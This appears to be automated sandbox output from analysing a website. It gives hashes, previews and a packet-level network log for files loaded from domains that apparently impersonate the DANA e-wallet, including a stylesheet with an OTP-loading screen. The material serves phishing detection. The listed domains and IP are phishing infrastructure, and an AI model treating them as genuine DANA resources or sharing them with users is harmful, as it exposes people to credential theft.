                                                                                                                            Size (bytes):1561
                                                                                                                            Entropy (8bit):4.844867479268656
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:NYNPerlBvFVu3DuYVk7iGviVN3DuYVkMpcJIJ+JzJ9MAD:NXn9NM4
                                                                                                                            MD5:553A4FEACEBE4A339E3F83B082684FF8
                                                                                                                            SHA1:7334803536F6429C43AD344DA92E22414E5882C2
                                                                                                                            SHA-256:94E570A73C7171A271962B2C59739196B2101BBA6CE3257E1E60743013CDAF32
                                                                                                                            SHA-512:8DDCD2ED8ABA26B91608713162AC771E283645BFE4C89F8596C363DA05BA0BB31AA4AF608CFD9D0883725F7EE860589F75C73F9FAA20B48D930FB8BFE0E8FF05
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/loader.css
                                                                                                                            Preview:/*********************/.process {top: 0;left: 0;right: 0;position: fixed;display: flex;justify-content: center;align-items: center;background: #0000005b;z-index: 999999999;width: 100%;height: 100%;}.loading {margin-top: -50px;position: absolute;display: flex;justify-content: center;align-items: center;}.loading img {width: 50px;}.loading .spinner{position: absolute;width: 35px;animation: spin 1s linear infinite;-webkit-animation: spin 1s linear infinite;-moz-animation: spin 1s linear infinite;-ms-animation: spin 1s linear infinite;-o-animation: spin 1s linear infinite;}.loadingOtp {background: #fff;width: 100%;z-index: 9999;position: absolute;display: flex;justify-content: center;align-items: center;}.loadingOtp img {width: 50px;}.loadingOtp .spinner{position: absolute;width: 35px;animation: spin 1s linear infinite;-webkit-animation: spin 1s linear infinite;-moz-animation: spin 1s linear infinite;-ms-animation: spin 1s linear infinite;-o-animation: spin 1s linear infinite;}@keyframes s
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):5078
                                                                                                                            Entropy (8bit):7.9162479598001845
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:SlG0ml1KICtII+3ok+yNdfBPA00KFY14dooNVO+3RrSGo2XR+nPRtu7MrprxeA12:iGrkIPYk+yNl0K+142+ZSpEEnPYM9xe3
                                                                                                                            MD5:E8E4E4432355A07040A7327673850223
                                                                                                                            SHA1:B07F6CFAACB6A2093778B08DD8D9B8F7D718C119
                                                                                                                            SHA-256:50B4BAD00572D07C6158459A5CB93B1B3F9BDEA95D393AA56970AFDED2F58913
                                                                                                                            SHA-512:7A88F02C1B3A28D852476219C80A3C5493FDC94339B19B3A2FC2C6F9EC9A8661636CD26E43CEC0A601B668AC1C5F02D3965832F89E76E4574953860EB945C636
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:http://penukran-poin-dana.aktsx.cfd/asset/img/load_spin.png
                                                                                                                            Preview:.PNG........IHDR..............Qf.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME...............IDATx...{....ZzQ...Z; .C.m.x.m.../.x..?;6Nf..N....v...m..$..!.[.VWW..u.....kU.....R.{..t...U.O...>4.0...'..8.(R....%......I..$.q...]$H.B...E..I.M6...l.M..P..$..!.0S...L3F?I,..D....|U.U.;.p.@.',.G,.B.....A.(TX.g..y..Ls...0pI1....^..x8..b.e......p;...!.BE.)^.....I..N..{..p.|b....s.0.*.N2..m..*.p...".$101(aV...00..`.b...fL.[...<\\ .0.^`.9.2...4...Y..L....@.8.&...1E..pq.%...l.e..r..E....).H..&I..66...>...e.;....2L$.*d..:W...B.-.a.[......s..e."%.*....$F....c.12....?..<.6.g.......8..).Hp..\..P*.q,\.,.#...?3.Fp.[...... .0cd.....!...:.....X,l...4Y.W....`...M...3..kn.j...x.M>5.`.c......6s..|9.i.......5>.E..[.'.<3|..|.Z...EM7#<...X.....X.G....P.Q<.u>.<)../b..y...........f..L.....a...._m.C*..+|.y.... ....?.-.!.E.-i.y.QR.G*uK.G.e..:.-Y...J........1........jf...>N0I.*......./.W.6..U=.\...S..[|...-.!.R...c......-.y.G....e.b..
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:MS Windows icon resource - 6 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):101471
                                                                                                                            Entropy (8bit):2.6435807166195042
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:wsa0333K///bggnggnggnggPgg/gg/gg/gg3HabzXDbHG7FHWJ:wX0333K///THabjGpHi
                                                                                                                            MD5:8F1BAC7AE69451BDF9C44B09577CF28C
                                                                                                                            SHA1:4FE47A2D13F8B8BDF5966DC6C4E9E245B00E91C1
                                                                                                                            SHA-256:8CD0EE2909907B3B0F78D1FD1E7223E2ECC90069261768D98C4B8C7CBEE0F9F5
                                                                                                                            SHA-512:7A33D5879926C4BC7E69F66EEBCA9E0E5A1BA1DC04D5FB4B058ACF0AE20E2F18693C423FB9B3F19433A940CD3180D2EECAED4AE1BB60E84CA5E0383BFC6A1A9A
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://www.dana.id/favicon.ico
                                                                                                                            Preview:............ .....f......... .(...W...@@.... .(B......00.... ..%...Q.. .... .....Ow........ .h........PNG........IHDR.............\r.f....IDATx.....eu...;.D.BN.;9dL.+,....\.b.......pUGZ.r!..Y..Q.`$..!*.R..Aj.A......)$eb......|.|....}.9..3....3gv;........P.k....S.{x.......4...\...W....L. ..@0..`.........s.`.n.....^..).w..k.y.|.....b..b...<.gV./.......&..L. ..@0..`............?Z.m..K...S.....<...^`Kv..L. ..@0..`.........;.s..8]U\..b~{.5..[....<..j..-..@0..`............&...?...W.K^-.Z...>*.?Z..C.|...a............&..L. ..@..?.....K.(....`..}./.~.%v..L. ..@0..`.........k~......%....Z..h.-..>.?..... ..@0..`............vy....v..s...,./...q.ui>...-...........&..L. ..@0..`...........`C.......[>.......&..L. ..@0..`........,.W........s..6.........&..L. ..@.cko.Su.......B.s...b^}O..b>.....).?,._..-......@0..`............&...(....b~..".O..{..U.?..b^}O.J1.ii8..?7^.ZO...qz....9./4^...s......&..L. ..@0..`.......-...........b^}..^1...p.....X..<.._.w..Nq........v..L. ..@0..`
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (8320)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):8657
                                                                                                                            Entropy (8bit):5.264060362015081
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:+twVzETNBzp0FINVJ5xH/kLRHEHFrrTKVgx8UuWYJPY:gwVAT/pMINDXH89k5reVgSUuWYi
                                                                                                                            MD5:AA6E142201142F16F7D60CD0EBE9506B
                                                                                                                            SHA1:749DBD66AECA71B9C99D9513BC5EC73DF56D0C21
                                                                                                                            SHA-256:124547B63964181D189D03DBB1884508FEA77622F32709D236552C2C46368C55
                                                                                                                            SHA-512:E685EAE3AF2260BC4C1C9015AF024B2C66375138A270F5474330229FF34D4CBB387EC9E3977DE7B326FF9DDF3C1D8A54E2E810A8783191EE13CB1C113AF4448D
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://unpkg.com/ionicons@7.1.0/dist/ionicons/p-d15ec307.js
                                                                                                                            Preview:let e,t,n=!1;const l="undefined"!=typeof window?window:{},s=l.document||{head:{}},o={t:0,l:"",jmp:e=>e(),raf:e=>requestAnimationFrame(e),ael:(e,t,n,l)=>e.addEventListener(t,n,l),rel:(e,t,n,l)=>e.removeEventListener(t,n,l),ce:(e,t)=>new CustomEvent(e,t)},i=e=>Promise.resolve(e),c=(()=>{try{return new CSSStyleSheet,"function"==typeof(new CSSStyleSheet).replaceSync}catch(e){}return!1})(),r="http://www.w3.org/1999/xlink",u=new WeakMap,a=e=>"sc-"+e.o,f={},y=e=>"object"==(e=typeof e)||"function"===e,$=(e,t,...n)=>{let l=null,s=null,o=!1,i=!1;const c=[],r=t=>{for(let n=0;n<t.length;n++)l=t[n],Array.isArray(l)?r(l):null!=l&&"boolean"!=typeof l&&((o="function"!=typeof e&&!y(l))&&(l+=""),o&&i?c[c.length-1].i+=l:c.push(o?h(null,l):l),i=o)};if(r(n),t){t.key&&(s=t.key);{const e=t.className||t.class;e&&(t.class="object"!=typeof e?e:Object.keys(e).filter((t=>e[t])).join(" "))}}const u=h(e,null);return u.u=t,c.length>0&&(u.$=c),u.h=s,u},h=(e,t)=>({t:0,p:e,i:t,m:null,$:null,u:null,h:null}),d={},p=(e,t,
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (790), with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):790
                                                                                                                            Entropy (8bit):4.933448562000252
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:uE50J6DI3VEbsc2ZLEyLJbq4WsLbzzbWKhbG:950J9EbsPZYi77jX4
                                                                                                                            MD5:8308D2EA1D6EA02C0CB00F298799633E
                                                                                                                            SHA1:6DEEDBF3EEA7D45BD140179D681C8F78613073D6
                                                                                                                            SHA-256:FE9DF1A47B206F90C0F6A9BD88239D8EB22313978376F04D9E3FAB4A35317380
                                                                                                                            SHA-512:8D3345AD46056B4DE2B1D5C0B76F8DDF039B987244D92284C53D39EBB9EC4DBF640D1B3884427039DE2247C0D86A88CB91761B02A9E15174EA408BF16F40E5B4
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/container.css
                                                                                                                            Preview:.index {width: 100%;height: 100%;background: #118EEA;z-index: 9999;}.index .hero {margin: 20px 0;width: 100%;height: 330px;display: flex;justify-content: center;align-items: center;}.index .hero img {width: 90%;}.index .content {width: 100%;text-align: center;}.index .content h1 {margin-top: 60px;font-size: 24px;font-weight: 700;}.index .content .desc {margin-top: 7px;font-size: 16px;}.index .content .line {width: 80px;margin: 20px auto;height: 6px;border-radius: 30px;opacity: 0.7;background: #fff;}.index .content .log {font-size: 16px;}.index .content button:hover {background: #f4f4f4;transition: .2s;}.index .content button {margin-top: 20px;width: 90%;height: 47px;background: #fff;color: #118EEA;font-size: 16px;font-weight: 600;border: none;border-radius: 10px;transition: .2s;}
                                                                                                                            No static file info
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Oct 6, 2024 13:49:55.039019108 CEST49674443192.168.2.6173.222.162.64
                                                                                                                            Oct 6, 2024 13:49:55.288939953 CEST49673443192.168.2.6173.222.162.64
                                                                                                                            Oct 6, 2024 13:49:55.367204905 CEST49672443192.168.2.6173.222.162.64
                                                                                                                            Oct 6, 2024 13:50:03.274653912 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:03.274683952 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:03.274780035 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:03.275460005 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:03.275468111 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.194578886 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.194679022 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:04.199825048 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:04.199831963 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.200154066 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.201731920 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:04.201731920 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:04.201750040 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.202033043 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:04.243447065 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.378638983 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.378735065 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.378839970 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:04.379492044 CEST49715443192.168.2.640.113.110.67
                                                                                                                            Oct 6, 2024 13:50:04.379503965 CEST4434971540.113.110.67192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.648988962 CEST49674443192.168.2.6173.222.162.64
                                                                                                                            Oct 6, 2024 13:50:04.710421085 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:04.711055040 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:04.715768099 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.715892076 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:04.716039896 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:04.716295958 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.716743946 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:04.721582890 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:04.902117968 CEST49673443192.168.2.6173.222.162.64
                                                                                                                            Oct 6, 2024 13:50:04.968425989 CEST49672443192.168.2.6173.222.162.64
                                                                                                                            Oct 6, 2024 13:50:05.615854025 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.615875959 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.615891933 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.615906954 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.615982056 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.615982056 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.616014004 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.616039991 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.616056919 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.616071939 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.616086960 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.616090059 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.616102934 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.616110086 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.616159916 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.620873928 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.620909929 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.620927095 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.620965958 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.620970964 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.621017933 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.718502998 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.719075918 CEST4972180192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.719913960 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.721386909 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.723470926 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.723618984 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.723823071 CEST8049721165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.723917961 CEST4972180192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.724560976 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.724661112 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.724716902 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.726042032 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:05.726067066 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.726130009 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:05.726293087 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.726408958 CEST4972280192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.726457119 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.726469040 CEST4972180192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.726835012 CEST4972080192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.727024078 CEST49724443192.168.2.6104.17.249.203
                                                                                                                            Oct 6, 2024 13:50:05.727039099 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.727150917 CEST4972380192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.729310989 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.731168032 CEST8049722165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.731216908 CEST8049721165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.731564045 CEST8049720165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.731900930 CEST8049723165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.732095003 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.732117891 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.732182026 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.732426882 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.732435942 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.732491016 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.733104944 CEST49726443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.733119011 CEST44349726172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.733694077 CEST49725443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.733705997 CEST44349725172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.738121986 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.738168001 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.738256931 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.738735914 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.738748074 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.738800049 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.739398003 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.739411116 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.739461899 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.740017891 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.740035057 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.740086079 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.740883112 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.740891933 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.740947008 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.741952896 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.741970062 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.742765903 CEST49728443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.742778063 CEST4434972823.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.743168116 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.743181944 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.743643999 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.743650913 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.743915081 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.743927956 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843260050 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843288898 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843303919 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843319893 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843329906 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.843368053 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.843465090 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843481064 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843496084 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843518972 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.843522072 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843537092 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843552113 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.843561888 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.843586922 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.844409943 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.844456911 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.844471931 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.844486952 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.844500065 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.844525099 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.881711006 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:05.886563063 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.908437014 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.908484936 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.908586025 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.908967972 CEST49732443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:05.908982038 CEST4434973223.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.910101891 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.910137892 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:05.910451889 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.912000895 CEST49733443192.168.2.6172.217.18.1
                                                                                                                            Oct 6, 2024 13:50:05.912010908 CEST44349733172.217.18.1192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045213938 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045253038 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045278072 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045291901 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045306921 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045310974 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.045321941 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045336962 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045351028 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045358896 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.045367956 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045384884 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.045407057 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.045407057 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.045548916 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.050370932 CEST8049717165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.093137980 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.093208075 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.093271971 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.093532085 CEST49735443192.168.2.6151.101.194.137
                                                                                                                            Oct 6, 2024 13:50:06.093554020 CEST44349735151.101.194.137192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.098900080 CEST4971780192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.199965954 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.201415062 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.201767921 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.201790094 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.201806068 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.201822042 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.201848030 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.201919079 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.201987028 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.202003002 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.202019930 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.202033043 CEST8049716165.22.241.119192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.202050924 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.202718019 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.202760935 CEST4971680192.168.2.6165.22.241.119
                                                                                                                            Oct 6, 2024 13:50:06.211175919 CEST44349724104.17.249.203192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.214858055 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.216392040 CEST49731443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.216423988 CEST4434973123.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.216865063 CEST49727443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.216896057 CEST4434972723.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.217024088 CEST49729443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.217036963 CEST4434972923.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.217308044 CEST49730443192.168.2.623.185.0.4
                                                                                                                            Oct 6, 2024 13:50:06.217315912 CEST4434973023.185.0.4192.168.2.6
                                                                                                                            Oct 6, 2024 13:50:06.217650890 CEST49724443192.168.2.6104.17.249.203
